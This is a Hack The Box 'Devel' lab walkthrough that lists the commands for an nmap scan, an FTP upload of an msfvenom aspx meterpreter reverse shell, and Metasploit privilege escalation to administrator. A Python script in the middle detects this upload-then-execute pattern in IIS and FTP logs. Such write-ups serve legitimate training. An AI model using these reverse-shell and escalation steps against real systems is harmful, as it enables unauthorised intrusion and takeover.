Hack The Box Devel walkthrough

Let us first do an nmap scan:

nmap -sS -A -p- 10.10.10.5 -oN nmap.txt

From the results we can see that we have 2 ports/services running:

  1. FTP running on port 21 – The ftp-anon script reveals that we can authenticate to the FTP server anonymously, and it lists the contents of the default directory, revealing various files that are characteristic of a Microsoft IIS web server. This means that we can use FTP to upload files that can then be accessed via the web server.
  2. Microsoft IIS 7.5 web server running on port 80.

This preliminary scan reveals very important information about our target that we can use to stage and structure our attack.

We have anonymous FTP access and we can upload files directly to the web server. This gives us an idea of the type of attack we can stage. We will generate an aspx reverse shell with Msfvenom and upload it to the web server via FTP, after which we can set up our reverse shell handler with Metasploit and execute the reverse shell via the web browser.

By default, Microsoft IIS is configured to run either asp or aspx files, the latter being the more widely supported. We can begin our exploitation by generating an aspx reverse meterpreter payload with Msfvenom.

Exploitation

Accessing the web server reveals a default installation of Microsoft IIS 7.5 that displays the IIS logo; this logo is also visible from the FTP server.

FTP allows anonymous login.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=4444 -f aspx > shell.aspx

So we will log in anonymously:

ftp 10.10.10.5


After generating the payload with Msfvenom we can upload it to the web server via FTP using the FTP put command. We can then list the contents of the directory to confirm that the aspx shell has been uploaded.


Because this is a meterpreter shell, we need to set up a handler with Metasploit. We can fire up Metasploit and use the exploit/multi/handler module.

We then need to set the payload to the one we used to generate the reverse shell with Msfvenom. In this case, the payload we will be using is windows/meterpreter/reverse_tcp.

After setting up our module options we can run the listener and execute the aspx meterpreter shell on the web server, after which we should get a meterpreter session.

So we run the listener, then trigger the payload from the web browser.

Just type this into your web browser:

10.10.10.5/shell.aspx

And it will execute immediately.
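From the defender's side, the upload-then-trigger sequence above leaves a simple trace in the server's own logs. As an added example (not part of the original walkthrough), this Python script correlates a Microsoft FTP Service log with the IIS site log and flags any script file stored over FTP that is later requested over HTTP; the log lines are constructed, and the #Fields layouts are assumed to match the default W3C logging of FTP 7.5 and IIS 7.5.

```python
# Correlates Microsoft FTP Service and IIS W3C logs to spot the pattern above:
# a script file stored over FTP, then requested over HTTP on the same site.
EXECUTABLE = (".aspx", ".asp", ".ashx", ".asmx")  # extensions IIS hands to a script handler
# Constructed sample logs (not from the walkthrough). The #Fields headers are
# assumed to match the default W3C layouts of Microsoft FTP 7.5 and IIS 7.5.
FTP_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-01 10:00:01 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230 0 0 1 /
2024-01-01 10:00:05 10.10.14.2 anonymous 10.10.10.5 21 STOR shell.aspx 226 0 0 1 /shell.aspx
2024-01-01 10:00:06 10.10.14.2 anonymous 10.10.10.5 21 STOR notes.txt 226 0 0 1 /notes.txt
2024-01-01 10:00:07 10.10.14.2 anonymous 10.10.10.5 21 STOR denied.aspx 550 5 0 1 /denied.aspx
"""
IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:00 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 12
2024-01-01 10:00:09 10.10.10.5 GET /Shell.aspx - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 830
2024-01-01 10:00:10 10.10.10.5 GET /notes.txt - 80 - 10.10.14.2 Mozilla/5.0 200 0 0 5
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def ftp_upload_then_http_exec(ftp_log, iis_log):
    """One finding per script file STORed over FTP and later requested over HTTP (paths compared case-insensitively)."""
    uploads = {}
    for rec in parse_w3c(ftp_log):
        path = rec["x-fullpath"].lower()
        # 226 = transfer complete; a rejected STOR (550) never reached the webroot
        if rec["cs-method"] == "STOR" and rec["sc-status"] == "226" and path.endswith(EXECUTABLE):
            uploads[path] = (rec["cs-username"], rec["c-ip"], rec["date"] + " " + rec["time"])
    findings = []
    for rec in parse_w3c(iis_log):
        stem = rec["cs-uri-stem"].lower()
        if stem in uploads:  # the uploaded script was requested, i.e. executed by IIS
            user, ip, uploaded_at = uploads[stem]
            findings.append({"path": stem, "ftp_user": user, "uploader": ip, "uploaded_at": uploaded_at,
                             "requested_by": rec["c-ip"], "http_status": rec["sc-status"]})
    return findings

for f in ftp_upload_then_http_exec(FTP_LOG, IIS_LOG):
    print(f"ALERT {f['path']}: stored by {f['ftp_user']}@{f['uploader']} at {f['uploaded_at']}, "
          f"then fetched by {f['requested_by']} (HTTP {f['http_status']})")
```

The same correlation can be run over real log directories by reading each file into the two parsers; disabling anonymous write on the FTP site removes the upload path altogether.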


Now that we have access to the box with a meterpreter session, we can start performing some local enumeration to understand what users and privileges we have and what environment we are working in. The sysinfo command reveals that the box is running Windows 7 build 7600. We can then get a shell on the box and run system commands like whoami, which reveals that we are currently logged in as the IIS AppPool service user.

So let us now do some privilege escalation:

meterpreter > getsystem

We can also utilize the local exploit suggester module in Metasploit; this module scans a system for potential post/privesc exploits that can be used to elevate privileges.

The first step is to put our meterpreter session in the background, after which we can search and load the module.

Just type:

meterpreter > background

We can then set the SESSION ID to that of our meterpreter session and run the module. The results reveal various privesc modules that are suitable; after some research, the best option is exploit/windows/local/ms13_053_schlamperei.

set SESSION 1

The module runs successfully and injects the exploit; we can now get back into our meterpreter session and migrate into the winlogon.exe process, which now has elevated privileges.

Just type:

meterpreter > migrate 452

Then drop into a shell:

meterpreter > shell


Now we are in as admin.